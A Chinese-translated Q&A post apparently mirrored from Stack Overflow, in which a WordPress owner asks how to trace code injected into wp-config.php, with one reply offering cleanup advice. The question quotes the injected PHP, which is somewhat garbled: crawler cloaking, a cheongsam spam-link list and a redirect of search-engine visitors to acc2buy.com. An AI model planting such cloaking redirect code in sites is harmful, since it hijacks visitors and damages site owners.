如何追踪注入 wp-config.php 的标头重定向

Posted 2023-02-19

【中文标题】如何追踪注入 wp-config.php 的标头重定向

【英文标题】：How to track down a header redirect being injected into wp-config.php

【发布时间】：2016-06-20 21:24:13

【问题描述】：

我将代码注入我的一个网站。我找不到罪魁祸首。我用 BackupBuddy 下载了这个网站，它显示了注入的代码，如下：

    <?php

    $referer = $_SERVER['HTTP_REFERER'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];

    $tmp = strtolower($_SERVER['HTTP_USER_AGENT']);

    if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'bing') !== false || 

    strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false) 




    cheongsam dress => "http://www.cozyladywear.com/qipao-cheongsam-c-87.html",
    cheongsam dresses => "http://www.goodorient.com/Dresses_C115",
    cheongsam style dress => "https://www.pinterest.com/explore/cheongsam-modern/",
    cheongsam dress pattern => "http://www.japanesesewingbooks.com/2014/01/13/free-girls-qi-pao-chinese-dress-pattern-and-sew-along/",
    dress cheongsam => "http://www.japanesesewingbooks.com/2014/01/13/free-girls-qi-pao-chinese-dress-pattern-and-sew-along/",
    cheongsam dresses for sale => "http://modernqipao.com/",
    red cheongsam dress => "http://redchinesedress.com/product-category/cheongsam-qipao/",
    black cheongsam dress => "https://www.etsy.com/market/black_cheongsam",
    cheongsam evening dress => "http://yannyexpress.com/collections/wedding-qipao-cheongsam",
    cheongsam dress for sale => "http://www.dresswe.com/cheongsam-dresses-103948/",
    short cheongsam dresses => "http://www.elegente.com/short-cheongsam",
    cheongsam inspired dresses => "https://www.pinterest.com/friedwontons4u/the-modern-girls-guide-to-cheongsamqipao/",
    lace cheongsam dress => "http://modernqipao.com/product-category/material/lace/",
    silk cheongsam dress => "http://www.efushop.com/index.php/goods/category/Silk-Brocade-cheongsam",
    vintage cheongsam dress => "https://www.etsy.com/market/vintage_cheongsam",
    blue cheongsam dress => "http://modernqipao.com/product-tag/blue/",
    purple cheongsam dress => "http://modernqipao.com/product-tag/purple-lavender-color/",
    white cheongsam dress => "https://www.pinterest.com/explore/cheongsam-wedding/",
    cotton cheongsam dress => "http://www.efushop.com/index.php/goods/category/Cotton-cheongsam",
    cheongsam dress sewing pattern => "http://vintagepatterns.wikia.com/wiki/Category:Cheongsam",
    cheongsam prom dress => "http://www.cozyladywear.com/fuchsia-fishtail-cheongsam-qipao-chinese-wedding-prom-dress-p-611.html",
    cheongsam inspired dress => "https://www.etsy.com/market/qipao",
    gold cheongsam dress => "http://modernqipao.com/product/gold-circled-lace-modern-mini-qipao-sexy-chinese-cheongsam-dress/",
    cheongsam dinner dress => "https://www.pinterest.com/yannyexpress/wedding-qipao-cheongsam-bridal-kwa-qun-couture-eve/",
    cheongsam bridesmaid dresses => "https://www.pinterest.com/explore/chinese-wedding-dresses/",
    pink cheongsam dress => "http://modernqipao.com/product-tag/pink-peach-champagne/",
    cheongsam short dress => "https://www.pinterest.com/cozyladywear/qipao-cheongsam/",
    hot cheongsam dress => "http://www.idreammart.com/chinese-dresses/2015-hot-cheongsam-chinese-dresses.html",
    cheongsam dresses uk => "http://www.kaiizhang.co.uk/",
    chinese traditional dress => "https://en.wikipedia.org/wiki/Chinese_clothing",
    traditional chinese dress => "http://www.travelchinaguide.com/intro/clothing/",
    traditional chinese dresses => "http://www.chinatoday.com/culture/qipao/qipao.htm",
    chinese dress traditional => "https://en.wikipedia.org/wiki/Cheongsam",


    );

            exit;
    
    //
    $from_search_engine = false;
    $jump_referer = array('google','bing','yahoo','msn','ask','yandex','aol');
    foreach($jump_referer as $ref)
        $ref_rst = stripos($referer,$ref);
        if($ref_rst > -1)
            $from_search_engine=true;
            break;
        
    

    if($from_search_engine)
        header("Location: http://www.acc2buy.com/");
        exit;
    
    ?>

此代码位于 wp-config.php 的最顶部 - 但是，当我通过 FTP 登录时，此代码不存在。因此，它会重定向所有尝试通过搜索引擎访问的用户。

我将如何追踪实际的注入文件？我已经对所有内容进行了 GREP，正在寻找对 wp-config.php 的任何引用。

我也从 index.php 开始，并通过 wp-blog-head.php 和 wp-load.php 工作 - 我似乎无法找到它的前置位置。

提前谢谢大家！

【问题讨论】：

只是试图提供尽可能多的信息 - 我已经阅读了该代码，它非常简单。我已经能够删除黑客。但我只是在努力寻找它现在是如何再生的。

您的某个 WP 插件或 WP 本身（如果它是旧版本）可能存在一些安全漏洞。您必须删除“hack”，并查看 Apache 中的访问日志和错误日志，以了解漏洞在哪里。听起来有人找到了利用您网站的方法，他们会继续这样做，直到您修复漏洞

【参考方案1】：

我已经检查了你的问题，做一件事只是压缩这个文件作为备份，并在更改主机、用户名和密码后删除现有文件

有时在 cpanel 中查看代码时代码不会显示，因此最好的方法是在更改后上传新文件并删除旧文件

希望你能得到解决方案 随时询问任何与恶意软件相关的问题:)